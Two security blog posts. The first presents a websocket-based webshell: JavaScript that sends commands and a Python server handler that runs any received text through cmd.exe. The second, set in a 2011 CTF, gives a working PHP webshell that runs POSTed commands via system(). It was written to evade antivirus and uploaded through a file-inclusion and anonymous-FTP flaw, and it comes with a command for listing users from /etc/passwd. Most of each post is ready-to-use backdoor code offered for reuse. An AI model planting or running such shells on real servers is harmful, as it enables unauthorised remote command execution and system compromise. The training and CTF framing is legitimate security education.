Simple websockets based webshell

I’m writing again after a year! It’s been an eventful one at that. Multiple conferences and two successful Xtreme Web Hacking trainings in that period.

As part of the XWH training that Akash and I did at nullcon 2015, I built an app to demo the functionality and usage of websockets. I went overboard and converted it into a full fledged web shell.

Websocket Client

The client is a simple connect and send call to a websockets server:


function WebSocketShell()
{
if ("WebSocket" in window)
{
var server = "serverip_or_hostname:9998/server"
var ws = new WebSocket("ws://" + server);

ws.onopen = function()
{
ws.send('ipconfig');
};

ws.onmessage = function (evt)
{
var received_msg = evt.data;
alert(received_msg);
};

ws.onclose = function(a)
{
alert('Error here');
};
}
else
{
alert("WebSocket NOT supported by your Browser!");
}
}

Websocket Server

The websockets server is a pywebsocket instance. The server side code is a python script that handles the incoming connection and the text.
The text is then passed to a subprocess.Popen call to be executed on the server. The output is collected and sent back to the client via the websocket.

def web_socket_transfer_data(request):
 while True:
  line = request.ws_stream.receive_message()
  if line is None:
   return
  if isinstance(line, unicode):
   proc = subprocess.Popen('cmd.exe /c ' + line, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
   out = proc.stdout.read() + proc.stderr.read()
   request.ws_stream.send_message(out, binary=False)
  else:
   request.ws_stream.send_message('Send plain text only!', binary=True)

Get it!

The code is available on Github: You can get it here

Usage

To run the server on port 9998 (default in the code, can be changed):

  1. Get pywebsocket
  2. Run python pywebsocket\mod_pywebsocket\standalone.py -p 9998 -w ws_server
  3. Open index.html in any browser that supports websockets. Latest Chrome/Firefox is good enough.
  4. Enter a (Windows) command like ipconfig
  5. Hit the Execute! button.
  6. Potato.
Happy Hacking!

Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application’s home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here’s the code:





simple php shell PoC - karniv0re



System Info



<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>

Command Output


<?php
if(isset($_POST['cmd'])){
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";
}
system($cmd);
die;
}
?>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!